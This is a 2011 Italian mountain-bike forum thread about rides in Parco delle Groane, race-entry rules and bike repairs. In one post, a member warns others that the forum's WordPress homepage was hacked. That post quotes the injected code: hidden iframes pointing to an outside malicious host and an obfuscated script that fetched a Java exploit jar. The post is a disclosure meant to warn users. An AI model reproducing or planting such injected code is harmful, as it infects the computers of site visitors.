Parco Groane/Lura III - ...

Stato
Chiusa ad ulteriori risposte.

kailed

Biker paradisiacus
26/7/10
6.042
0
0
Cusano Milanino
Visita sito
Bike
RR5.2
Linux non era semplicemente il target di quell'attacco lì perchè tanto non lo usa quasi nessuno. Linux ha delle vulnerabilità a volte veramente tremende... una fra tutte:

https://dc414.org/2011/04/fun-with-cve-2011-0997/
Purtroppo non esistono software senza bug, la differenza sta nel fatto che:
1) i problemi non vengono tenuti nascosti
2) i fix spesso sono disponibili poche ore dopo la scoperta della falla

Detto questo, la differenza vera la fa quasi sempre quel pezzo di carne cruda che sta tra la sedia e il monitor :il-saggi:

Mi sa che siamo un filo OT :nunsacci:

Ciao.
 

Mauro Riga

Biker velocissimus
15/5/08
2.419
0
0
Senagorium
Visita sito
Attenzione update.

Questo non l'ho scritto prima, ma in data 31/5/2011 degli indiani hanno sfruttato una vulnerabilità in Wordpress ed hanno inserito del codice malevolo sulla homepage di "mtb-forum.it". Probabilmente la vulnerabilità sfruttata è la seguente:
[url]http://www.exploit-db.com/exploits/17299/[/URL]

Il codice iniettato era il seguente:

<iframe src='[url]http://indometastan.in/in.cgi?default[/URL]' width='2' height='2'
frameborder='0'></iframe><iframe
src='[url]http://indometastan.in/in.cgi?default[/URL]' width='2' height='2'
frameborder='0'></iframe><iframe
src='[url]http://indometastan.in/in.cgi?default[/URL]' width='2' height='2'
frameborder='0'></iframe><br />
<b>Warning</b>: Cannot modify header information - headers already sent
by (output started at /home/www/wusr0001/index.php:1) in
<b>/home/www/wusr0001/wp-content/plugins/tgn-embed-everything/tgn-embed-everything.php</b>

on line <b>61</b><br />
<iframe src='[url]http://indometastan.in/in.cgi?default[/URL]' width='2' height='2'
frameborder='0'></iframe>
<html xmlns="http://www.w3.org/1999/xhtml" dir="" lang="">
<head>


fortunatamente avevano implementato il
codice seguente per offuscare il codice malevolo, che lo rendeva
lentissimo da eseguire:

ar2="["+(document.getElementsByTagName("div")[1].innerHTML).replace(/c/g,",");
ar2=e(ar2);
s="";
a ="";
for (i=0;i!=ar2.length-2;i++){
q=ar2;
e("s+=ar.substr(q / 7,1)");
}


Questo avrebbe fatto scaricare poi il seguente Jar dall'url fros63.cz.cc:

function end_redirect(){}var javafile='./games/getJavaInfo.jar'

Questo Jar non faceva altro che prendere la versione locale della Java
applet, per lanciare serie di exploit Java.

Nel mio caso Windows XP sp3 lanciava questo:
[url]http://www.zerodayinitiative.com/advisories/ZDI-10-056/[/URL]

Consiglio a tutti coloro che hanno visitato il sito in quel giorno di fare una
scansione antivirus, soprattutto se la visione è avvenuta da una macchina Windows o MacosX


Wordpress è molto usato ma è un cesso.
"spaghetti code" a voler essere buoni..




dan@kailed:~> uname -a
Linux kailed 2.6.31.14-0.6-desktop #1 SMP PREEMPT 2010-12-10 11:18:32 +0100 i686 athlon i386 GNU/Linux

Bye.

Linux non era semplicemente il target di quell'attacco lì perchè tanto non lo usa quasi nessuno. Linux ha delle vulnerabilità a volte veramente tremende... una fra tutte:

[url]https://dc414.org/2011/04/fun-with-cve-2011-0997/[/URL]

Purtroppo non esistono software senza bug, la differenza sta nel fatto che:
1) i problemi non vengono tenuti nascosti
2) i fix spesso sono disponibili poche ore dopo la scoperta della falla

Detto questo, la differenza vera la fa quasi sempre quel pezzo di carne cruda che sta tra la sedia e il monitor :il-saggi:

Mi sa che siamo un filo OT :nunsacci:

Ciao.

Oh ragazzi ,come diceva qualcuno..........perchè non parlate in stampatello così che, riesco-riusciamo a capire pure noi se l'argomento trattato e davvero pericoloso o meno.
Ad ogni modo io la scansione(completa) l'ho fatta ieri e non mi risulta niente di strano.
Posso ritenermi uno che ha il pezzo di carne cruda grosso???

Fine ot
 

giorgiof

Biker infernalis
25/8/08
1.939
11
0
Nel Bosco
Visita sito
Oh ragazzi ,come diceva qualcuno..........perchè non parlate in stampatello così che, riesco-riusciamo a capire pure noi se l'argomento trattato e davvero pericoloso o meno.
Ad ogni modo io la scansione(completa) l'ho fatta ieri e non mi risulta niente di strano.
Posso ritenermi uno che ha il pezzo di carne cruda grosso???

Fine ot

Fondamentalmente degli indiani hanno modificato qualche decina di migliaia di siti web, fra cui mtb-forum, per prendere il controllo dei computer che vedevano quelle pagine.

Per nostra fortuna gli accorgimenti usati per rendere questa modifica meno riconoscibile, hanno rallentato molto l'esecuzione dell'attacco sui computer delle persone che visualizzavano i contenuti. Per questo hanno infettato probabilmente un numero esiguo di macchine.

Però sicuramente qualcuno lo hanno "cuccato"
 

fabio72

Biker velocissimus
27/8/07
2.528
1
0
a Nord
Visita sito
Eccomi :cucù: rientrato all'ovile groaniano in piena crisi di astinenza :i-want-t:..... con oggi è una settimana esatta senza bike :azz-se-m: .......e date le previsioni :rosik: l'uscita dal tunnel è ancora lontana :cry:


@Espertoni e Smanettoni pc: martedì o mercoledì scorso non riuscivo a connettermi al forum......:nunsacci:.......era per il problema che avete descritto in Fenicio post moderno? :spetteguless: tanto usavo il pc del lavoro.......

A presto :celopiùg: (speriamo)
 

die1971

Biker ciceronis
io ho fatto la scansione della bibletta e ho trovato:

fango nel ponticello della forcella
erba nel cambio
sassi nella catena
unto sulle manopole

dite che posso connettermi ancora ?

fabbio ..... basta frignare....
l'anno prossimo vieni a fare la 6 ore di albosaggia.....te le sto provando tutte ma tu non mi dai proprio retta....

io stasera esco, chi vuole venire a fare un giro parli.....
partenza da sud del parco...
 

fabio72

Biker velocissimus
27/8/07
2.528
1
0
a Nord
Visita sito
io ho fatto la scansione della bibletta e ho trovato:

fango nel ponticello della forcella
erba nel cambio
sassi nella catena
unto sulle manopole

dite che posso connettermi ancora ?

fabbio ..... basta frignare....
l'anno prossimo vieni a fare la 6 ore di albosaggia.....te le sto provando tutte ma tu non mi dai proprio retta....

io stasera esco, chi vuole venire a fare un giro parli.....
partenza da sud del parco...

Oggi non ce l'ho proprio più fatta......... ho aperto la finestra, ho visto che non pioveva e via :via!: a :i-want-t: dalle Groane a Milano centro :cucù:
Ero troppo in crisi d'astinenza :-| pedalatoria e stasera altri 35/40 Km non me li toglie nessuno...... nemmeno l'eventuale pioggia

Abbi pazienza......è per me un anno un po' particolare......nuovo figlio, nuova auto, troppe spese e scuse varie.......
Ho nel mirino la 12h by night della Val di Sole a luglio e dato che sarò già in zona potrebbe essere la volta buona :omertà:....e poi probabilmente la 24h di Milano......:nunsacci:....sperem
 

fabio72

Biker velocissimus
27/8/07
2.528
1
0
a Nord
Visita sito
per quella di cesate ho chiesto se è indispensabile il certificato da agonista ma fede65 non mi risponde..

Io avevo chiesto direttamente al CO e questa è stata la risposta:

[FONT=&quot]From:[/FONT][FONT=&quot] Friesian Team Info [mailto:[email protected]]
Sent: venerdì 20 maggio 2011 15.45
To: Polistena, Fabio
Subject: Re: Informazioni 12h MTB del 24 giugno[/FONT]


[FONT=&quot]Ciao,[/FONT][FONT=&quot][/FONT]
[FONT=&quot] [/FONT]
[FONT=&quot]mi dispiace ma il certificato medico di sana e robusta costituzione NON è valido, serve quello per attività agonistica.[/FONT][FONT=&quot][/FONT]
[FONT=&quot] [/FONT]
[FONT=&quot]La partenza della gara è dal Centro Sportivo di Cesate [/FONT][FONT=&quot][/FONT]
[FONT=&quot] [/FONT]
[FONT=&quot]Ciao[/FONT][FONT=&quot][/FONT]
[FONT=&quot]Claudia[/FONT][FONT=&quot][/FONT]
[FONT=&quot]----- Original Message ----- [/FONT]
[FONT=&quot]From:[/FONT][FONT=&quot] Polistena, Fabio [/FONT]
[FONT=&quot]To:[/FONT][FONT=&quot] [email protected] [/FONT]
[FONT=&quot]Sent:[/FONT][FONT=&quot] Friday, May 20, 2011 3:00 PM[/FONT]
[FONT=&quot]Subject:[/FONT][FONT=&quot] Informazioni 12h MTB del 24 giugno[/FONT]
[FONT=&quot] [/FONT]
Ciao,

Mi piacerebbe partecipare alle 12h di MTB che si terrà il 24 giugno prossimo, ma non sono in possesso di certificato medico per l’idoneità agonistica (posso avere quello di sana e robusta costituzione rilasciato da medico di base) nè sono tesserato per alcuna società sportiva.
Posso partecipare ugualmente?

Inoltre, da dove avverrà la partenza? Il circuito è nel Parco delle Groane?


Grazie,
[FONT=&quot]ciao

[/FONT]
 

giorgiof

Biker infernalis
25/8/08
1.939
11
0
Nel Bosco
Visita sito
Fabio.... mi sa che mi compro le cose per farmi manutenzione da solo alla bici come te. :rosik:

Mi hanno fatto pagare abbastanza per la registrazione della bici, provo il cambio e vedo che la terza marcia salta. Ricontrollo e non mi hanno allineato il forcellino! Si potrà essere così incompetenti!!!????!
 

fabio72

Biker velocissimus
27/8/07
2.528
1
0
a Nord
Visita sito
Fabio.... mi sa che mi compro le cose per farmi manutenzione da solo alla bici come te. :rosik:

Mi hanno fatto pagare abbastanza per la registrazione della bici, provo il cambio e vedo che la terza marcia salta. Ricontrollo e non mi hanno allineato il forcellino! Si potrà essere così incompetenti!!!????!

Chi fa da sè fa per tre! :il-saggi:

Comunque quello di trovare un meccanico affidabile è un problema diffuso...... :azz-se-m:
 
Stato
Chiusa ad ulteriori risposte.

Classifica giornaliera dislivello positivo

Classifica mensile dislivello positivo